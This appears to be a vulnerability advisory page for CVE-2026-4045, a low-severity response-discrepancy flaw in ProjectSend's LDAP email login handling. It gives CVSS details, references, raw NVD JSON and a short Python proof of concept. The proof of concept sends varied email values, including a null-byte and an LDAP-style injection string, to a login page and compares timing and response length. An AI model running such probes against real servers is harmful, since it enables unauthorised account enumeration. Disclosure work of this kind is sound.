Security Vulnerability Report
CVE-2026-4045 (CVSS 3.7, LOW)

Published: 2026-03-12 17:16:52
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in ProjectSend up to r1945. It affects an unknown function in the file includes/Classes/Auth.php. Manipulating the ldap_email argument can lead to an observable response discrepancy (CWE-203 / CWE-204). The attack can be executed remotely, but it is rated high complexity and exploitation is considered difficult. An exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond.

CVSS Details

CVSS Score: 3.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ProjectSend <= r1945

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import time

# CVE-2026-4045 PoC - LDAP Email Information Disclosure
# Target: ProjectSend <= r1945
# Location: includes/Classes/Auth.php

TARGET_URL = "http://target.com/"


def test_ldap_email_injection():
    """
    Test for LDAP email parameter manipulation leading to
    observable response discrepancy
    """
    # Test different email formats to observe response differences.
    # NOTE: the addresses below appear as "[email protected]" in the
    # published copy of this PoC; substitute the addresses to be compared.
    test_emails = [
        "[email protected]",
        "[email protected]",
        "[email protected]\x00",  # Null byte injection
        "[email protected]",
        "'or'1'='[email protected]",  # LDAP injection attempt
    ]

    for email in test_emails:
        start_time = time.time()

        # Simulate LDAP authentication request
        data = {
            'ldap_email': email,
            'ldap_password': 'test123'
        }

        try:
            response = requests.post(
                TARGET_URL + 'login.php',
                data=data,
                timeout=10
            )
            elapsed = time.time() - start_time

            # Status, timing and body length are the observable signals
            # compared across inputs (CWE-203 / CWE-204).
            print(f"Email: {email}")
            print(f"Status: {response.status_code}")
            print(f"Response Time: {elapsed:.4f}s")
            print(f"Response Length: {len(response.content)}")
            print("-" * 50)
        except requests.exceptions.RequestException as e:
            print(f"Error testing {email}: {e}")


if __name__ == "__main__":
    test_ldap_email_injection()
```

References

https://drive.google.com/file/d/1TNwWNTcra2ykx0yXpATPmsPgJxIxOrWb/view?usp=sharing
https://vuldb.com/?ctiid.350657
https://vuldb.com/?id.350657
https://vuldb.com/?submit.769577
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4045",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-12T17:16:52.457",
    "lastModified": "2026-04-29T01:00:01.613",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw has been found in projectsend up to r1945. This impacts an unknown function of the file includes/Classes/Auth.php. Executing a manipulation of the argument ldap_email can lead to observable response discrepancy. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."
      },
      {
        "lang": "es",
        "value": "Se ha encontrado un fallo en projectsend hasta r1945. Esto afecta a una función desconocida del archivo includes/Classes/Auth.PHP. La ejecución de una manipulación del argumento ldap_email puede llevar a una discrepancia observable en la respuesta. El ataque puede ejecutarse de forma remota. Un alto nivel de complejidad está asociado con este ataque. Se dice que la explotabilidad es difícil. El exploit ha sido publicado y puede ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 2.9,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 3.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 1.4
        }
      ],
      "cvssMetricV2": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "2.0",
            "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
            "baseScore": 2.6,
            "accessVector": "NETWORK",
            "accessComplexity": "HIGH",
            "authentication": "NONE",
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "baseSeverity": "LOW",
          "exploitabilityScore": 4.9,
          "impactScore": 2.9,
          "acInsufInfo": false,
          "obtainAllPrivilege": false,
          "obtainUserPrivilege": false,
          "obtainOtherPrivilege": false,
          "userInteractionRequired": false
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-203"},
          {"lang": "en", "value": "CWE-204"}
        ]
      }
    ],
    "references": [
      {"url": "https://drive.google.com/file/d/1TNwWNTcra2ykx0yXpATPmsPgJxIxOrWb/view?usp=sharing", "source": "[email protected]"},
      {"url": "https://vuldb.com/?ctiid.350657", "source": "[email protected]"},
      {"url": "https://vuldb.com/?id.350657", "source": "[email protected]"},
      {"url": "https://vuldb.com/?submit.769577", "source": "[email protected]"}
    ]
  }
}
```